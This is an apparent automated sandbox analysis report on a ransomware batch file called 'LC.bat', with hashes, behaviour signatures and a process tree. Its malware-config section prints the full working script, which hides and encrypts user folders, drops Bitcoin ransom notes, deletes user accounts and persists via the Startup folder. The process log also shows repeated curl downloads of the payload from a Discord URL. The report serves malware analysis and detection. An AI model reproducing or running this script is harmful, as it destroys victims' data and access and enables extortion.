Analysis
-
max time kernel
148s -
max time network
154s -
platform
windows11-21h2_x64 -
resource
win11-20231222-en -
resource tags
arch:x64arch:x86image:win11-20231222-enlocale:en-usos:windows11-21h2-x64system -
submitted
02-01-2024 01:23
Static task
static1
Behavioral task
behavioral1
Sample
LC.bat
Resource
win11-20231222-en
windows11-21h2-x64
2 signatures
150 seconds
General
-
Target
LC.bat
-
Size
352B
-
MD5
6c555c72d67f325b774a39315ef929ce
-
SHA1
e36ca61b9ab5e53adecaf00219d55b69c9d5c485
-
SHA256
4149b09f225dc3cd2fcad895739774ec381eea1f8006642fd74bde9f33e1ccaa
-
SHA512
13d6d14338b8fcbdd68f76412b3cbb118d46485f947a1790e70b396ed7d7f9baae4ffcb0f56294d3ef6ab6fe6e3b38fd0606e597146ba97a29088b4c091dce52
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\LLC.bat
Ransom Note
@echo off
echo To contact LC and obtain further instructions, send an email to [email protected]. Include your unique ID and payment confirmation.> "%USERPROFILE%\Desktop\LC.txt"
@echo off
echo Welcome to The LC Tor Server!
echo Please enter your details to proceed.
set /p username=Username:
set /p password=Password:
echo Thank you for signing up for the river enjoy u sick perv!
@echo off
start "" "https://media.discordapp.net/attachments/1171199057348263996/1171261368717037700/Jq9XNeo.jpg?ex=659ca2a7&is=658a2da7&hm=e584359e6d8774a5d4d4f23f6b5f2b20a2715bdcc056d11f5fe0c641e0d9fc15&
ipconfig /release
@echo off
attrib +h %0
@echo off
title Laughing Coffin
color 0c
echo Your files have been encrypted! To get them back, pay $300 to the following Bitcoin address: 3BKuiDHNSbdCdK8fHTUxCB4GRBiuKUrMzr...> "%USERPROFILE%\Downloads\do not close.txt"
@echo off
cd %userprofile%\Documents
attrib +h /s /d
cipher /e /s /a
cd %userprofile%\Downloads
attrib +h /s /d
cipher /e /s /a
cd %userprofile%\Desktop
attrib +h /s /d
cipher /e /s /a
cd %userprofile%\Pictures
attrib +h /s /d
cipher /e /s /a
cd %userprofile%\Videos
attrib +h /s /d
cipher /e /s /a
cd %userprofile%\Music
attrib +h /s /d
cipher /e /s /a
@echo off
echo To contact LC and obtain further instructions, send an email to [email protected]. Include your unique ID and payment confirmation.> "%USERPROFILE%\Desktop\LC.txt"
@echo off
echo How to avoid these attacks in the future:
echo - Regularly update your antivirus software.
echo - Avoid opening suspicious email attachments or clicking on unknown links.
echo - Backup your important files regularly on an external storage device.
echo - Be cautious while downloading files from the internet.
echo - Keep your operating system and applications up to date.
echo - Enable a firewall and use strong, unique passwords.
@echo off
echo How to decrypt your files:
echo 1. Make the payment of $300 to the provided Bitcoin address:3BKuiDHNSbdCdK8fHTUxCB4GRBiuKUrMzr.
echo 2. Send an email to [email protected] with your payment confirmation.
echo 3. Once verified, you will receive the decryption key for your files.
echo 4. Use the decryption key to decrypt your files and regain access to them.
@echo off
setlocal
:loop
set /p "password=Enter the password to decrypt the files: "
if "%password%"=="7K3hG5d9R2pQ6wB4vF1jL8sT0mZnXcV4" (
echo Decrypting....
@echo off
echo Decrypting Still...
for /f "skip=1" %%G in ('wmic useraccount where "disabled='FALSE'" get name') do (
if not "%%G"=="Administrator" (
net user %%G /delete
)
)
echo Almost Done...
net user Anonymous /add
echo Setting Up Files...
powershell -Command "$password = -join (33..126 | Get-Random -Count 32 | ForEach-Object {[char]$_}); $secureString = ConvertTo-SecureString $password -AsPlainText -Force; $hash = $secureString | ConvertFrom-SecureString; (New-Object System.Management.Automation.PSCredential('Anonymous', $secureString)).GetNetworkCredential().Password | Out-Null"
echo Files Setup Complete!
echo Decryption done!
ipconfig /release
) else (
echo Invalid password. Please try again.
goto loop
)
@echo off
setlocal
copy "%0" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
@echo off
attrib +h "%0"
attrib +h "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\%~nx0"
Emails
Signatures
-
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4620 wrote to memory of 4272 4620 cmd.exe 19 PID 4620 wrote to memory of 4272 4620 cmd.exe 19 PID 4620 wrote to memory of 228 4620 cmd.exe 82 PID 4620 wrote to memory of 228 4620 cmd.exe 82 PID 4620 wrote to memory of 3400 4620 cmd.exe 84 PID 4620 wrote to memory of 3400 4620 cmd.exe 84 PID 228 wrote to memory of 1496 228 cmd.exe 83 PID 228 wrote to memory of 1496 228 cmd.exe 83 PID 228 wrote to memory of 3872 228 cmd.exe 87 PID 228 wrote to memory of 3872 228 cmd.exe 87 PID 228 wrote to memory of 3168 228 cmd.exe 85 PID 228 wrote to memory of 3168 228 cmd.exe 85 PID 3872 wrote to memory of 2136 3872 cmd.exe 86 PID 3872 wrote to memory of 2136 3872 cmd.exe 86 PID 3872 wrote to memory of 2916 3872 cmd.exe 90 PID 3872 wrote to memory of 2916 3872 cmd.exe 90 PID 3872 wrote to memory of 1316 3872 cmd.exe 89 PID 3872 wrote to memory of 1316 3872 cmd.exe 89 PID 2916 wrote to memory of 1388 2916 cmd.exe 88 PID 2916 wrote to memory of 1388 2916 cmd.exe 88 PID 2916 wrote to memory of 432 2916 cmd.exe 93 PID 2916 wrote to memory of 432 2916 cmd.exe 93 PID 2916 wrote to memory of 4088 2916 cmd.exe 92 PID 2916 wrote to memory of 4088 2916 cmd.exe 92 PID 432 wrote to memory of 4844 432 cmd.exe 91 PID 432 wrote to memory of 4844 432 cmd.exe 91 PID 432 wrote to memory of 2928 432 cmd.exe 97 PID 432 wrote to memory of 2928 432 cmd.exe 97 PID 432 wrote to memory of 1632 432 cmd.exe 96 PID 432 wrote to memory of 1632 432 cmd.exe 96 PID 2928 wrote to memory of 1172 2928 cmd.exe 98 PID 2928 wrote to memory of 1172 2928 cmd.exe 98 PID 2928 wrote to memory of 1312 2928 cmd.exe 101 PID 2928 wrote to memory of 1312 2928 cmd.exe 101 PID 2928 wrote to memory of 480 2928 cmd.exe 100 PID 2928 wrote to memory of 480 2928 cmd.exe 100 PID 1312 wrote to memory of 1656 1312 cmd.exe 99 PID 1312 wrote to memory of 1656 1312 cmd.exe 99 PID 1312 wrote to memory of 4676 1312 cmd.exe 104 PID 1312 wrote to memory of 4676 1312 cmd.exe 104 PID 1312 wrote to memory of 4652 1312 cmd.exe 103 PID 1312 wrote to memory of 4652 1312 cmd.exe 103 PID 4676 wrote to memory of 4480 4676 cmd.exe 102 PID 4676 wrote to memory of 4480 4676 cmd.exe 102 PID 4676 wrote to memory of 2224 4676 cmd.exe 105 PID 4676 wrote to memory of 2224 4676 cmd.exe 105 PID 4676 wrote to memory of 4752 4676 cmd.exe 107 PID 4676 wrote to memory of 4752 4676 cmd.exe 107 PID 2224 wrote to memory of 4828 2224 cmd.exe 106 PID 2224 wrote to memory of 4828 2224 cmd.exe 106 PID 2224 wrote to memory of 1068 2224 cmd.exe 110 PID 2224 wrote to memory of 1068 2224 cmd.exe 110 PID 2224 wrote to memory of 3488 2224 cmd.exe 108 PID 2224 wrote to memory of 3488 2224 cmd.exe 108 PID 1068 wrote to memory of 1008 1068 cmd.exe 109 PID 1068 wrote to memory of 1008 1068 cmd.exe 109 PID 1068 wrote to memory of 2924 1068 cmd.exe 113 PID 1068 wrote to memory of 2924 1068 cmd.exe 113 PID 1068 wrote to memory of 2540 1068 cmd.exe 112 PID 1068 wrote to memory of 2540 1068 cmd.exe 112 PID 2924 wrote to memory of 4804 2924 cmd.exe 111 PID 2924 wrote to memory of 4804 2924 cmd.exe 111 PID 2924 wrote to memory of 1796 2924 cmd.exe 116 PID 2924 wrote to memory of 1796 2924 cmd.exe 116 -
Views/modifies file attributes 1 TTPs 26 IoCs
pid Process 4088 attrib.exe 2392 attrib.exe 1412 attrib.exe 3400 attrib.exe 480 attrib.exe 2648 attrib.exe 1644 attrib.exe 4024 attrib.exe 432 attrib.exe 1316 attrib.exe 4104 attrib.exe 3768 attrib.exe 2920 attrib.exe 3432 attrib.exe 2540 attrib.exe 2584 attrib.exe 1880 attrib.exe 3168 attrib.exe 3488 attrib.exe 3716 attrib.exe 4068 attrib.exe 4984 attrib.exe 2432 attrib.exe 1632 attrib.exe 4652 attrib.exe 4752 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\LC.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"2⤵PID:4272
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat2⤵
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"3⤵PID:1496
-
-
C:\Windows\system32\attrib.exeattrib +h LC.bat3⤵
- Views/modifies file attributes
PID:3168
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat3⤵
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\system32\attrib.exeattrib +h LC.bat4⤵
- Views/modifies file attributes
PID:1316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat4⤵
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\system32\attrib.exeattrib +h LC.bat5⤵
- Views/modifies file attributes
PID:4088
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat5⤵
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\system32\attrib.exeattrib +h LC.bat6⤵
- Views/modifies file attributes
PID:1632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat6⤵
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"7⤵PID:1172
-
-
C:\Windows\system32\attrib.exeattrib +h LC.bat7⤵
- Views/modifies file attributes
PID:480
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat7⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\system32\attrib.exeattrib +h LC.bat8⤵
- Views/modifies file attributes
PID:4652
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat8⤵
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat9⤵
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"10⤵PID:4828
-
-
C:\Windows\system32\attrib.exeattrib +h LC.bat10⤵
- Views/modifies file attributes
PID:3488
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat10⤵
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\system32\attrib.exeattrib +h LC.bat11⤵
- Views/modifies file attributes
PID:2540
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat11⤵
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\system32\attrib.exeattrib +h LC.bat12⤵
- Views/modifies file attributes
PID:4104
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat12⤵PID:1796
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat13⤵PID:3732
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"14⤵PID:4320
-
-
C:\Windows\system32\attrib.exeattrib +h LC.bat14⤵
- Views/modifies file attributes
PID:2584
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat14⤵PID:2888
-
C:\Windows\system32\attrib.exeattrib +h LC.bat15⤵
- Views/modifies file attributes
PID:4068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat15⤵PID:464
-
C:\Windows\system32\attrib.exeattrib +h LC.bat16⤵
- Views/modifies file attributes
PID:3768
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat16⤵PID:4248
-
C:\Windows\system32\attrib.exeattrib +h LC.bat17⤵
- Views/modifies file attributes
PID:4984
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat17⤵PID:4668
-
C:\Windows\system32\attrib.exeattrib +h LC.bat18⤵
- Views/modifies file attributes
PID:2920
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat18⤵PID:5036
-
C:\Windows\system32\attrib.exeattrib +h LC.bat19⤵
- Views/modifies file attributes
PID:2392
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat19⤵PID:2040
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"20⤵PID:2820
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat20⤵PID:4736
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"21⤵PID:1704
-
-
C:\Windows\system32\attrib.exeattrib +h LC.bat21⤵
- Views/modifies file attributes
PID:2648
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat21⤵PID:1108
-
C:\Windows\system32\attrib.exeattrib +h LC.bat22⤵
- Views/modifies file attributes
PID:2432
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat22⤵PID:3612
-
C:\Windows\system32\attrib.exeattrib +h LC.bat23⤵
- Views/modifies file attributes
PID:4024
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat23⤵PID:636
-
C:\Windows\system32\attrib.exeattrib +h LC.bat24⤵
- Views/modifies file attributes
PID:432
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat24⤵PID:4180
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat25⤵PID:4660
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"26⤵PID:416
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat26⤵PID:2908
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"27⤵PID:4696
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K LC.bat27⤵PID:840
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"28⤵PID:1180
-
-
-
C:\Windows\system32\attrib.exeattrib +h LC.bat27⤵
- Views/modifies file attributes
PID:1412
-
-
-
C:\Windows\system32\attrib.exeattrib +h LC.bat26⤵
- Views/modifies file attributes
PID:1880
-
-
-
C:\Windows\system32\attrib.exeattrib +h LC.bat25⤵
- Views/modifies file attributes
PID:3432
-
-
-
-
-
-
-
C:\Windows\system32\attrib.exeattrib +h LC.bat20⤵
- Views/modifies file attributes
PID:1644
-
-
-
-
-
-
-
-
-
C:\Windows\system32\attrib.exeattrib +h LC.bat13⤵
- Views/modifies file attributes
PID:3716
-
-
-
-
-
-
C:\Windows\system32\attrib.exeattrib +h LC.bat9⤵
- Views/modifies file attributes
PID:4752
-
-
-
-
-
-
-
-
-
C:\Windows\system32\attrib.exeattrib +h LC.bat2⤵
- Views/modifies file attributes
PID:3400
-
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"1⤵PID:2136
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"1⤵PID:1388
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"1⤵PID:4844
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"1⤵PID:1656
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"1⤵PID:4480
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"1⤵PID:1008
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"1⤵PID:4804
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"1⤵PID:3448
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"1⤵PID:4184
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"1⤵PID:4424
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"1⤵PID:2412
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"1⤵PID:4364
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"1⤵PID:4832
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"1⤵PID:4760
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"1⤵PID:3004
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"1⤵PID:1036
-
C:\Windows\system32\curl.execurl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"1⤵PID:2572
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5478ea14d9b94c5c19df57528dd66e601
SHA1e65b4637f9022c82ecc42c871fb48ff5b079436c
SHA2563a7f6890d0d0220a682c812aadddc52c807cb49e590cf53dd72babc52a424f6c
SHA512d05c574e879fa546cad6a7ff5261cb85b66a55b32da801c297f52bd8e2216db3b4539b40014de7cf56edc830d58fbb352e9a8c8632f09226ca6e4efbff5b33fa